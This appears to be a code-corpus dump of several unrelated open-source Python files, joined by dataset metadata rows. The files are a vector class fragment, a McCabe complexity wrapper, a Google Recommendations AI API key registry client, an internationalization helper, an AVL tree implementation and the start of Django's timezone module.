return Vector2D(x*cos_theta - y*sin_theta, x*sin_theta + y*cos_theta)
def lerp(self, other, amount):
"""Linearly interpolate between this vector and another."""
return self + amount*(other - self)
def angle(self, radians=True):
"""
Return the angle at which this vector points relative to the
positive x-axis.
"""
angle = math.atan2(self.y, self.x)
if not radians:
angle = math.degrees(angle)
return angle
Vector2D.origin = Vector2D(0, 0) | mit | 1,201,121,418,191,547,100 | 22.215827 | 71 | 0.652511 | false | 2.882931 | false | false | false |
danny200309/anaconda | anaconda_lib/linting/anaconda_mccabe.py | 9 | 1577 | # -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
"""
Anaconda McCabe
"""
import ast
from .mccabe import McCabeChecker
class AnacondaMcCabe(object):
"""Wrapper object around McCabe python script
"""
checker = McCabeChecker
def __init__(self, code, filename):
self.code = code
self.filename = filename
@property
def tree(self):
"""Compile and send back an AST if buffer is able to be parsed
"""
try:
code = self.code.encode('utf8') + b'\n'
return compile(code, self.filename, 'exec', ast.PyCF_ONLY_AST)
except SyntaxError:
return None
def get_code_complexity(self, threshold=7):
"""Get the code complexity for the current buffer and return it
"""
if self.tree is not None:
self.checker.max_complexity = threshold
return self.parse(self.checker(self.tree, self.filename).run())
return None
def parse(self, complexities):
"""
Parse the given list of complexities to something that anaconda
understand and is able to handle
"""
errors = []
for complexity in complexities:
errors.append({
'line': int(complexity[0]),
'offset': int(complexity[1] + 1),
'code': complexity[2].split(' ', 1)[0],
'message': complexity[2].split(' ', 1)[1]
})
return errors
| gpl-3.0 | 8,689,864,748,901,092,000 | 24.852459 | 75 | 0.574509 | false | 4.022959 | false | false | false |
googleapis/python-recommendations-ai | google/cloud/recommendationengine_v1beta1/services/prediction_api_key_registry/client.py | 1 | 28310 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.recommendationengine_v1beta1.services.prediction_api_key_registry import (
pagers,
)
from google.cloud.recommendationengine_v1beta1.types import (
prediction_apikey_registry_service,
)
from .transports.base import PredictionApiKeyRegistryTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import PredictionApiKeyRegistryGrpcTransport
from .transports.grpc_asyncio import PredictionApiKeyRegistryGrpcAsyncIOTransport
class PredictionApiKeyRegistryClientMeta(type):
"""Metaclass for the PredictionApiKeyRegistry client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[PredictionApiKeyRegistryTransport]]
_transport_registry["grpc"] = PredictionApiKeyRegistryGrpcTransport
_transport_registry["grpc_asyncio"] = PredictionApiKeyRegistryGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[PredictionApiKeyRegistryTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class PredictionApiKeyRegistryClient(metaclass=PredictionApiKeyRegistryClientMeta):
"""Service for registering API keys for use with the ``predict``
method. If you use an API key to request predictions, you must first
register the API key. Otherwise, your prediction request is
rejected. If you use OAuth to authenticate your ``predict`` method
call, you do not need to register an API key. You can register up to
20 API keys per project.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "recommendationengine.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PredictionApiKeyRegistryClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PredictionApiKeyRegistryClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> PredictionApiKeyRegistryTransport:
"""Returns the transport used by the client instance.
Returns:
PredictionApiKeyRegistryTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def event_store_path(
project: str, location: str, catalog: str, event_store: str,
) -> str:
"""Returns a fully-qualified event_store string."""
return "projects/{project}/locations/{location}/catalogs/{catalog}/eventStores/{event_store}".format(
project=project,
location=location,
catalog=catalog,
event_store=event_store,
)
@staticmethod
def parse_event_store_path(path: str) -> Dict[str, str]:
"""Parses a event_store path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/catalogs/(?P<catalog>.+?)/eventStores/(?P<event_store>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def prediction_api_key_registration_path(
project: str,
location: str,
catalog: str,
event_store: str,
prediction_api_key_registration: str,
) -> str:
"""Returns a fully-qualified prediction_api_key_registration string."""
return "projects/{project}/locations/{location}/catalogs/{catalog}/eventStores/{event_store}/predictionApiKeyRegistrations/{prediction_api_key_registration}".format(
project=project,
location=location,
catalog=catalog,
event_store=event_store,
prediction_api_key_registration=prediction_api_key_registration,
)
@staticmethod
def parse_prediction_api_key_registration_path(path: str) -> Dict[str, str]:
"""Parses a prediction_api_key_registration path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/catalogs/(?P<catalog>.+?)/eventStores/(?P<event_store>.+?)/predictionApiKeyRegistrations/(?P<prediction_api_key_registration>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, PredictionApiKeyRegistryTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the prediction api key registry client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, PredictionApiKeyRegistryTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, PredictionApiKeyRegistryTransport):
# transport is a PredictionApiKeyRegistryTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def create_prediction_api_key_registration(
self,
request: prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest = None,
*,
parent: str = None,
prediction_api_key_registration: prediction_apikey_registry_service.PredictionApiKeyRegistration = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> prediction_apikey_registry_service.PredictionApiKeyRegistration:
r"""Register an API key for use with predict method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.CreatePredictionApiKeyRegistrationRequest):
The request object. Request message for the
`CreatePredictionApiKeyRegistration` method.
parent (str):
Required. The parent resource path.
``projects/*/locations/global/catalogs/default_catalog/eventStores/default_event_store``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
prediction_api_key_registration (google.cloud.recommendationengine_v1beta1.types.PredictionApiKeyRegistration):
Required. The prediction API key
registration.
This corresponds to the ``prediction_api_key_registration`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.recommendationengine_v1beta1.types.PredictionApiKeyRegistration:
Registered Api Key.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, prediction_api_key_registration])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest,
):
request = prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if prediction_api_key_registration is not None:
request.prediction_api_key_registration = (
prediction_api_key_registration
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_prediction_api_key_registration
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_prediction_api_key_registrations(
self,
request: prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPredictionApiKeyRegistrationsPager:
r"""List the registered apiKeys for use with predict
method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.ListPredictionApiKeyRegistrationsRequest):
The request object. Request message for the
`ListPredictionApiKeyRegistrations`.
parent (str):
Required. The parent placement resource name such as
``projects/1234/locations/global/catalogs/default_catalog/eventStores/default_event_store``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.recommendationengine_v1beta1.services.prediction_api_key_registry.pagers.ListPredictionApiKeyRegistrationsPager:
Response message for the
ListPredictionApiKeyRegistrations.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest,
):
request = prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_prediction_api_key_registrations
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListPredictionApiKeyRegistrationsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def delete_prediction_api_key_registration(
self,
request: prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Unregister an apiKey from using for predict method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.DeletePredictionApiKeyRegistrationRequest):
The request object. Request message for
`DeletePredictionApiKeyRegistration` method.
name (str):
Required. The API key to unregister including full
resource path.
``projects/*/locations/global/catalogs/default_catalog/eventStores/default_event_store/predictionApiKeyRegistrations/<YOUR_API_KEY>``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest,
):
request = prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_prediction_api_key_registration
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-recommendations-ai",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("PredictionApiKeyRegistryClient",)
| apache-2.0 | 4,932,179,393,963,767,000 | 42.486943 | 201 | 0.63165 | false | 4.619778 | false | false | false |
MediaKraken/MediaKraken_Deployment | source/common/common_internationalization.py | 1 | 1325 | """
Copyright (C) 2017 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
import pycountry
from babel.dates import format_date
from babel.numbers import format_decimal
def com_inter_date_format(date_to_format, country_code='en_US'):
return format_date(date_to_format, locale=country_code)
def com_inter_number_format(number_to_format, country_code='en_US'):
return format_decimal(number_to_format, locale=country_code)
def com_inter_country_name(country_code='eng'):
try:
lang = pycountry.languages.get(alpha_3=country_code)
except KeyError:
return country_code
if lang is None:
return country_code
return lang.name
| gpl-3.0 | -7,388,436,541,744,186,000 | 32.974359 | 69 | 0.743396 | false | 3.955224 | false | false | false |
AbhiAgarwal/prep | python/avl_rotation.py | 1 | 12791 | class AVLNode(object):
def __init__(self, key):
self.key=key
self.right_child=None
self.left_child=None
self.parent=None
self.height=0
self.balance=0
def update_height(self, upwards=True):
#If upwards we go up the tree correcting heights and balances,
#if not we just correct the given node.
if self.left_child is None:
#Empty left tree.
left_height = 0
else:
left_height = self.left_child.height+1
if self.right_child is None:
#Empty right tree.
right_height = 0
else:
right_height = self.right_child.height+1
#Note that the balance can change even when the height does not,
#so change it before checking to see if height needs updating.
self.balance = left_height-right_height
height = max(left_height, right_height)
if self.height != height:
self.height = height
if self.parent is not None:
#We only need to go up a level if the height changes.
if upwards:
self.parent.update_height()
def is_left(self):
#Handy to find out whether a node is a left or right child or neither.
if self.parent is None:
return self.parent
else:
return self is self.parent.left_child
class AVLTree(object):
def __init__(self):
self.root =None
def insert(self, key, node=None):
#The first call is slightly different.
if node is None:
#First call, start node at root.
node = self.root
if node is None:
#Empty tree, create root.
node = AVLNode(key=key)
self.root=node
return node
else:
ret= self.insert(key=key, node=node)
self.balance(ret)
return ret
#Not a first call.
if node.key ==key:
#No need to insert, key already present.
return node
elif node.key >key:
child = node.left_child
if child is None:
#Reached the bottom, insert node and update heights.
child = AVLNode(key=key)
child.parent=node
node.left_child = child
node.update_height()
return child
else:
return self.insert(key=key, node=child)
elif node.key < key:
child = node.right_child
if child is None:
#Reached the bottom, insert node and update heights.
child = AVLNode(key=key)
child.parent=node
node.right_child = child
return child
else:
return self.insert(key=key, node=child)
else:
print "This shouldn't happen."
def find(self, key, node=None):
if node is None:
#First call.
node=self.root
if self.root is None:
return None
else:
return self.find(key, self.root)
#Now we handle nonfirst calls.
elif node.key == key:
#Found the node.
return node
elif key < node.key:
if node.left_child is None:
#If key not in tree, we return a node that would be its parent.
return node
else:
return self.find(key,node.left_child)
else:
if node.right_child is None:
return node
else:
return self.find(key, node.right_child)
def delete(self, key, node=None):
#Delete key from tree.
if node is None:
#Initial call.
node = self.find(key)
if (node is None) or (node.key != key):
#Empty tree or key not in tree.
return
if (node.left_child is None) and (node.right_child is not None):
#Has one right child.
right_child = node.right_child
left = node.is_left()
if left is not None:
parent=node.parent
if not left:
parent.right_child=right_child
else:
parent.left_child=right_child
right_child.parent =parent
self.balance(parent)
else:
right_child.parent=None
self.root = right_child
#No need to update heights or rebalance.
elif (node.left_child is not None) and (node.right_child is None):
#Has one left child.
left_child = node.left_child
left= node.is_left()
if left is not None:
parent=node.parent
if left:
parent.left_child=left_child
else:
parent.right_child=right_child
left_child.parent =parent
self.balance(parent)
else:
left_child.parent=None
self.root=left_child
elif node.left_child is None:
#Has no children.
parent = node.parent
if parent is None:
#Deleting a lone root, set tree to empty.
self.root = None
else:
if parent.left_child is node:
parent.left_child =None
else:
parent.right_child=None
self.balance(parent)
else:
#Node has two childen, swap keys with successor node
#and delete successor node.
right_most_child = self.find_leftmost(node.right_child)
node.key = right_most_child.key
self.delete(key=node.key,node=right_most_child)
#Note that updating the heights will be handled in the next
#call of delete.
def find_rightmost(self, node):
if node.right_child is None:
return node
else:
return self.find_rightmost(node.right_child)
def find_leftmost(self, node):
if node.left_child is None:
return node
else:
return self.find_leftmost(node.left_child)
def find_next(self, key):
node = self.find(key)
if (node is None) or (node.key != key):
#Key not in tree.
return None
else:
right_child = node.right_child
if right_child is not None:
node= self.find_leftmost(right_child)
else:
parent = node.parent
while(parent is not None):
if node is parent.left_child:
break
node = parent
parent = node.parent
node=parent
if node is None:
#Key is largest in tree.
return node
else:
return node.key
def find_prev(self, key):
node = self.find(key)
if (node is None) or (node.key != key):
#Key not in tree.
return None
else:
left_child = node.left_child
if left_child is not None:
node= self.find_rightmost(left_child)
else:
parent = node.parent
while(parent is not None):
if node is parent.right_child:
break
node = parent
parent = node.parent
node=parent
if node is None:
#Key is largest in tree.
return node
else:
return node.key
def balance(self, node):
node.update_height(False)
if node.balance == 2:
if node.left_child.balance != -1:
#Left-left case.
self.right_rotation(node)
if node.parent.parent is not None:
#Move up a level.
self.balance(node.parent.parent)
else:
#Left-right case.
self.left_rotation(node.left_child)
self.balance(node)
elif node.balance ==-2:
if node.right_child.balance != 1:
#Right-right case.
self.left_rotation(node)
if node.parent.parent is not None:
self.balance(node.parent.parent)
else:
#Right-left case.
self.right_rotation(node.right_child)
self.balance(node)
else:
if node.parent is not None:
self.balance(node.parent)
#I also include a new plotting routine to show the balances or keys of the node.
def plot(self, balance=False):
#Builds a copy of the BST in igraphs for plotting.
#Since exporting the adjacency lists loses information about
#left and right children, we build it using a queue.
import igraph as igraphs
G = igraphs.Graph()
if self.root is not None:
G.add_vertices(1)
queue = [[self.root,0]]
#Queue has a pointer to the node in our BST, and its index
#in the igraphs copy.
index=0
not_break=True
while(not_break):
#At each iteration, we label the head of the queue with its key,
#then add any children into the igraphs graph,
#and into the queue.
node=queue[0][0] #Select front of queue.
node_index = queue[0][1]
if not balance:
G.vs[node_index]['label']=node.key
else:
G.vs[node_index]['label']=node.balance
if index ==0:
#Label root green.
G.vs[node_index]['color']='green'
if node.left_child is not None:
G.add_vertices(1)
G.add_edges([(node_index, index+1)])
queue.append([node.left_child,index+1])
G.vs[index+1]['color']='red' #Left children are red.
index+=1
if node.right_child is not None:
G.add_vertices(1)
G.add_edges([(node_index, index+1)])
G.vs[index+1]['color']='blue'
queue.append([node.right_child, index+1])
index += 1
queue.pop(0)
if len(queue)==0:
not_break=False
layout = G.layout_reingold_tilford(root=0)
igraphs.plot(G, layout=layout)
def right_rotation(self, root):
left=root.is_left()
pivot = root.left_child
if pivot is None:
return
root.left_child = pivot.right_child
if pivot.right_child is not None:
root.left_child.parent = root
pivot.right_child = root
pivot.parent = root.parent
root.parent=pivot
if left is None:
self.root = pivot
elif left:
pivot.parent.left_child=pivot
else:
pivot.parent.right_child=pivot
root.update_height(False)
pivot.update_height(False)
def left_rotation(self, root):
left=root.is_left()
pivot = root.right_child
if pivot is None:
return
root.right_child = pivot.left_child
if pivot.left_child is not None:
root.right_child.parent = root
pivot.left_child = root
pivot.parent = root.parent
root.parent=pivot
if left is None:
self.root = pivot
elif left:
pivot.parent.left_child=pivot
else:
pivot.parent.right_child=pivot
root.update_height(False)
pivot.update_height(False)
def sort(lst, ascending=True):
A = AVLTree()
for item in lst:
A.insert(item)
ret=[]
if ascending:
node=A.find_leftmost(A.root)
if node is not None:
key = node.key
else:
key=node
while (key is not None):
ret.append(key)
key=A.find_next(key)
else:
node=A.find_rightmost(A.root)
if node is not None:
key = node.key
else:
key=node
while (key is not None):
ret.append(key)
key=A.find_prev(key)
return ret
def test_rotation():
lst= [1,4,2,5,1,3,7,11,4.5]
print "List is ",lst
B = AVLTree()
for item in lst:
print "inserting", item
B.insert(item)
node=B.find(4)
B.left_rotation(node)
B.plot(True)
B.right_rotation(node.parent)
test_rotation() | mit | 4,788,308,656,106,740,000 | 32.574803 | 80 | 0.506215 | false | 4.273638 | false | false | false |
knowsis/django | django/utils/timezone.py | 90 | 9180 | """
Timezone-related classes and functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import sys
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
from django.utils import six
__all__ = [
'utc',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept identical to the reference version. Subclasses contain improvements.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
